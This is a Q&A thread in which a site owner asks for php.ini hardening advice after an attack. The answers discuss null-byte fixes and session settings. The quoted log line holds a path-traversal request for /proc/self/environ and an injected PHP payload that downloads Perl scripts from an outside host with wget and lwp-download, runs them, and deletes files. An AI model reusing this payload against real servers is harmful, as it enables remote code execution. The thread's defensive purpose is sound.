# php.ini security setting after attack

Tags: php, hardening

My website have been attacked and I need a best practice for a php.ini I have done some reading but I am still not sure if I covered most of the options.

here is my settings:

```
file_uploads = Off
upload_tmp_dir = /var/php_tmp
upload_max_filezize = 0M
allow_url_fopen = Off
allow_url_include = Off
safe_mode = On
display_errors = Off
magic_quotes_gpc = On
magic_quotes_runtime = On
max_file_uploads=0
```

here is what I got error log from the webhost company:

```
121.254.216.170 - - [12/Sep/2011:05:21:07 +0100] "GET /?p=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5806 "-" "http://some.thesome.com/etc/byz.jpg? -O /tmp/cmd548;cd /tmp;lwp-download http://some.thesome.com/etc/cup.txt;perl cup.txt;rm -rf *.txt*;wget http://some.thesome.com/etc/update.txt;perl update.txt;rm -rf *.txt*'); echo \"#j13mb0t\"; ?>"
```

Comment: Have a look at http://security.stackexchange.com/q/563/485 - not quite a dupe, but in the same area.

Answer (score 3, accepted):

First of all,  this attack will not work on the latest 5.3 branch because [null byte poisoning attacks have been fixed](https://bugs.php.net/bug.php?id=39863) for file-io functions.   That being said none of your settings will defend against these attacks except for magic_qutoes_gpc in some edge cases because the null byte will be escaped.  Although to be honest I would disable magic_qutoes_gpc,  you should not rely upon it for security and more often than not it will malform user input.  magic_quotes_gpc is being removed in php6.

To make sure php is configured properly you should run [PHPSecInfo](http://phpsec.org/projects/phpsecinfo/index.html).  You should also remove the write bit from your entire web root,  and remove `file_privs` from your mysql account.  Here is more information for [locking down php](http://phpsec.org/projects/guide/).

Comment: Thank you very much indeed your precise answer. This why I asked here. My provider just could not say a word. Thanks again. (I am not wise:) enough to rank you up yet:) but I would.

Comment: Note the referer header, that's the more interesting attack in this example, see the answer on the [very similar question](http://security.stackexchange.com/questions/7080/how-to-find-and-protect-against-the-exploited-vulnerability-in-an-php-application/7095#7095).

Comment: @Rook Thanks again, I have just spotted out your answer and I tried my code with php5.3 and suddenly I got 500 error. so something definitely wrong... any idea? thanks

Answer (score 1):

This might help someone.

```
expose_php = off
disable_functions = phpinfo
session.auto_start = 0
session.cookie_httponly = 1
session.cookie_secure = 1
session.name = sessId
session.hash_function = sha256
session.hash_bits_per_character = 5
```

Comment: welcome to the site and thanks for your answer. But could you format it a little better and maybe add some details about your suggestions?

Comment: It would be more helpful if you explained what these settings are supposed to do.

Comment: expose_php =off - Will not expose php and it's version. You can even change the extensions of files to .html which would hide the app is using PHP. disable_functions = phpinfo(); -

Comment: Contd...disable_functions = phpinfo(); - Will disable the in-built function phpinfo which displays PHP version,details of PHPconfig. session_auto_start = 0 - Which will turn off the session start auto. session.name -> Can rename the session name which appears client side (When you view it in browser's firebug panel -> net tab -> HTML tab -> Request Headers-> Cookie-> SessionName & SessID) sessionHashFunction which will hash the sessionId.5 indicates noofchar's used/sessID.